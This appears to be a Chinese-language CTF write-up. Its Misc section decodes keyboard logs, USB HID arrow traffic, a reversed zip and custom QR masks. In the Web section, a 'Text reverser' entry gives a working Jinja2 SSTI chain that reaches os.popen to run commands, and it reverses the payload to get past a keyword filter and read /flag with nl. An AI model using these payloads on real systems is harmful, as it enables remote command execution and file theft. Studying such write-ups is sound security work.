Misc
easy_keyboard
题解
- 下载附件,写脚本
import re
key_pattern = re.compile('KeyDown "(.*?)"')
with open('secret.Q', 'r') as r:
content = r.readlines()
a = []
for i in content:
b = re.findall(key_pattern, i)
if b:
a.append(b[0].lower())
print(a)
a = ''.join(a)
a = a.replace('shift', '').replace("backspace", '\b').replace('space', ' ').replace('num ', '')
print(a)- 得到输出的内容
if you want to decrypt the zip file.you need to get the key.i am a very good person.
so i will give you the key directly.the key is very easy.
as long as you get the key and you can see the files in the compressed zip
.fine1it’s time to give you the key.the key is 123456.
oh1sorry.this is the key of my bank card password.
the true key is 6e187bef.the key is 6e187bef.the key is 64187bef
- 重写脚本,不替换
backspace
if you want to decrypt the zip file.you need to geyt t the key.
i am a very good person.so i i will give you the key dirte ectly.
the key is very easy.
as long as you get the key and you can see the files in the compressed zu ip.
fine1it's time to give you the key.the key is 123456.oh1 sorr sorry.
this is the key of my vba banc k card password.
the ture t rue key is 6e187bef.
the key2 is 323d1a4b 6e187bef.
the key3 is f 0 6 7 e c 9 4 64187bef- 得到明文攻击的三个密钥
- 6e187bef
- 323d1a4b
- f067ec94
- 解压得到一份 USB 流量,提取流量
tshark -r keyboard.pcapng -T fields -e usbhid.data > usbdata.txt
得到的usb.txt中发现是4f,50,51,52,并不在一般的键盘按键范围,于是查找键盘按键https://max.book118.com/html/2017/0407/99227972.shtm
发现对应的是箭头
→↓←↓→ ↓→↑↓↓ ↓→↑↓↓ →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓↓ →↓↓ ↓↓ →↓↓ →↓↓ ↓↓ →↓←→↓← →↓←↓→↑←↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓ →↓↓↑←↑ →↓↓←↑↑ →↓←↓→ →↓↓←↑↑ ↓↓→↑← →←↓→↓← →↓↓←↑↑ ↓→↑↓↓ →↓←→↓← →←↓→↓← →↓←↓→↑←↑ →↓←↓→↑←↑ →←↓→↓← →←↓→↓← ↓↓ →↓←↓→ →↓←↓→↑←↑ →↓←→↓← →↓↓↑←↑ →↓↓↑←↑ →←↓→↓← ↓↓ ↓↓→↑← →↓←→↓← →↓↓←↑↑ →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓←↓→ ↓→↑↓↓ →↓←↓→↑←↑ ↓↓→↑← ↓↓ ↓↓→↑← →↓↓ →↓←↓→↑←↑ →↓↓↑←↑ ↓↓ →←↓→↓← →↓↓↑←↑ →↓↓↑←↑ →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓←↑↑ →↓↓ ↓→↑↓↓ →↓←→↓← →↓↓↑←↑ ↓↓→↑← ↓→↑↓↓ →↓←↓→↑←↑ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ →↓←→↓← ↓→↑↓↓ ↓↓→↑← →↓←→↓← ↓→↑↓↓ ↓↓ →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓←↓→ →↓←↓→↑←↑ →↓↓↑←↑ ↓→↑↓↓ →↓←↓→ →↓←↓→↑←↑ ↓↓→↑← →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓↓←↑↑ ↓↓→↑← ↓→↑↓↓ →↓↓←↑↑ ↓↓→↑← →↓←→↓← →↓↓
- exp
from PIL import Image
str = "4f5150514f00514f52515100514f525151004f50514f5150004f5151525052004f5150514f5250520051514f5250004f5151004f5151005151004f5151004f5151005151004f51504f5150004f5150514f5250520051514f5250004f5150514f525052004f5151004f5151525052004f5151505252004f5150514f004f51515052520051514f5250004f50514f5150004f515150525200514f525151004f51504f5150004f50514f5150004f5150514f525052004f5150514f525052004f50514f5150004f50514f5150005151004f5150514f004f5150514f525052004f51504f5150004f5151525052004f5151525052004f50514f51500051510051514f5250004f51504f5150004f5151505252004f5151525052004f5150514f5250520051514f5250004f5150514f00514f525151004f5150514f5250520051514f52500051510051514f5250004f5151004f5150514f525052004f5151525052005151004f50514f5150004f5151525052004f5151525052004f51515052520051514f5250004f5150514f525052004f5151505252004f515100514f525151004f51504f5150004f51515250520051514f525000514f525151004f5150514f525052004f5151505252004f51504f5150004f50514f5150004f5151525052004f5150514f525052004f51504f515000514f5251510051514f5250004f51504f515000514f525151005151004f5151505252004f5151004f5151505252004f51504f5150004f50514f5150004f51515052520051514f5250004f5150514f525052004f5150514f004f5150514f525052004f515152505200514f525151004f5150514f004f5150514f5250520051514f5250004f5151505252004f5151004f5151505252004f51515052520051514f525000514f525151004f51515052520051514f5250004f51504f5150004f515100"
img = Image.new('RGB', (len(str), len(str)))
i = 0
j = 5
print(len(str))
for n in range(len(str) // 2 -1):
print(str[n*2:(n+1)*2])
if str[n*2:(n+1)*2] == '4f':
for k in range(6):
i += 1
img.putpixel((i, j), (255, 255,255 ))
if str[n*2:(n+1)*2] == '51':
for k in range(6):
j += 1
# r, g, b = img.getpixel((i, j))
img.putpixel((i, j), (255, 255, 255))
if str[n*2:(n+1)*2] == '50':
for k in range(6):
i -= 1
# r, g, b = img.getpixel((i, j))
img.putpixel((i, j), (255, 255, 255))
if str[n*2:(n+1)*2] == '52':
for k in range(6):
j -= 1
# r, g, b = img.getpixel((i, j))
img.putpixel((i, j), (255, 255, 255))
if str[n*2:(n+1)*2] == '00':
j = 5
i = i + 10
img.show()2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
import binascii
from libnum import *
flag=2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
print(n2s(flag))- 另一个exp
import libnum
f = open("keyboard.pcapng","rb").read()
pos = 1340
draws = ["622488","22","62426","624624","26822","642624","22684","622","62426848","622848"]
chars = ["0","1","2","3","4","5","6","7","8","9"]
c = ""
while(pos < len(f)):
data = f[pos+57]
if(data == 0x52):
c += "8"
elif(data == 0x51):
c += "2"
elif(data == 0x50):
c += "4"
elif(data == 0x4f):
c += "6"
elif(data == 0):
c += " "
pos += 0x80
c = c.split(" ")[:-1]
ans = ""
for i in c:
ans += chars[draws.index(i)]
print(libnum.n2s(int(ans)))what_is_it.piz
题解
- 倒着的zip,写脚本复原
b = []
a = ... # 导出的 16进制数据
for i in a:
b.append(i)
c = []
for i in range(len(b)):
c.append(b[len(b) - i - 1])
with open('a.txt', 'w') as w:
w.write(''.join(c))- 删去文件头前多余的00,得到正常文件
- 解压后发现是一个word,修改压缩包后缀,改为 .doc
- 打开,发现一首歌,搜索原歌词,比对内容将错误的单词缺少的字母提出来
hylqeygvs
- 根据题目的提示信息,需要爆破字母的排列顺序
- 官方
exp
from string import ascii_uppercase as uppercase
from itertools import cycle
import hashlib
table = dict()
for ch in uppercase:
index = uppercase.index(ch)
table[ch] = uppercase[index:] + uppercase[:index]
deTable = {'A': 'A'}
start = 'Z'
for ch in uppercase[1:]:
index = uppercase.index(ch)
deTable[ch] = chr(ord(start) + 1 - index)
def deKey(key):
return ''.join([deTable[i] for i in key])
def encrypt(plainText, key):
result = []
# 创建cycle对象,支持密钥字母的循环使用
currentKey = cycle(key)
for ch in plainText:
if 'A' <= ch <= 'Z':
index = uppercase.index(ch)
# 获取密钥字母
ck = next(currentKey)
result.append(table[ck][index])
else:
result.append(ch)
return ''.join(result)
key = "TREX"
keys = deKey(key)
def Pailie(list1, start, end):
if start == end:
q = "".join(list1)
ans = encrypt(q, keys)
# print(ans)
flag = hashlib.md5(ans.encode()).hexdigest()
if ("5613a" in flag[0:5]):
print(flag)
else:
for i in range(start, end + 1):
list1[start], list1[i] = list1[i], list1[start]
Pailie(list1, start + 1, end)
list1[start], list1[i] = list1[i], list1[start]
mw = ['H', 'Y', 'L', 'E', 'V', 'S', 'G', 'Q', 'Y']
Pailie(mw, 0, len(mw) - 1)mask
题解
zip附加一个rar,把rar提取出来,得到自定义掩码的运算规则
mask0:(i+j) % 2
mask1:j % 2
mask2:i % 3
mask3:(i+j) % 3
mask4:(i//3+j//2)%2
mask5:(i*j)%3+(i*j)%2
mask6:((i*j)%3+i*j)%2
mask7:((i*j)%3+i+j)%2
mask8:(i*j) % 2
mask9:(i*j) % 3
mask10:(i^j) % 3
mask11:(i^j) % 2
mask12:(i//3+j//2)%3
mask13:(i^j)%3+(i^j)%2
mask14:((i^j)%3+i^j)%2
mask15:((i^j)%3+i+j)%2
- 这里就是重新定义的16种掩码,前8种是原始的掩码生成方式,只是换了一下顺序,所以去扫所有的二维码的时候,可能会发现有的二维码还是能直接扫出来,那就是在生成的时候随机刚好随机到了自己原来的源码
- 任意一个二维码的
png放入stegsolve中,可以发现在r0的左上角有隐写痕迹
- 多看几张图,可以发现就只有前四格存在隐写,结合描述说掩码的识别特征不在二维码区域,所以可以知道这个4位的数据就是16种掩码的特征位…
Web
小恐龙
题解
- 阅读源代码,伪造
cookie,得到flag
Text reverser
题解
- 应该是ssti,发现了一大堆过滤,发现它只会检测我们传过去的原生数据,不会检测那边反转好的字符串,如果我们传入反转后的即可绕过
output = '''{% print "".__class__.__bases__[0].__subclasses__()%}'''[::-1]
print(output)- 发送反转后的
payload得到类列表,然后将返回的列表内容复制进脚本寻找可利用的类
import json
a = """
<class 'type'>...<class 'unicodedata.UCD'>
"""
num = 0
allList = []
result = ""
for i in a:
if i == ">":
result += i
allList.append(result)
result = ""
elif i == "\n" or i == ",":
continue
else:
result += i
for k,v in enumerate(allList):
if "os._wrap_close" in v:
print(str(k)+"--->"+v)- 之后利用
popen方法执行系统命令
{% print "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls').read()%}
}%)(daer.)'galf/ ln'(]'nepop'[__slabolg__.__tini__.]231[)(__sessalcbus__.]0[__sesab__.__ssalc__."" tnirp %{- 这里过滤了很多读取文件的命令,可以利用nl的绕过过滤读取文件(后测试用grep和rev等命令也可以读取flag)
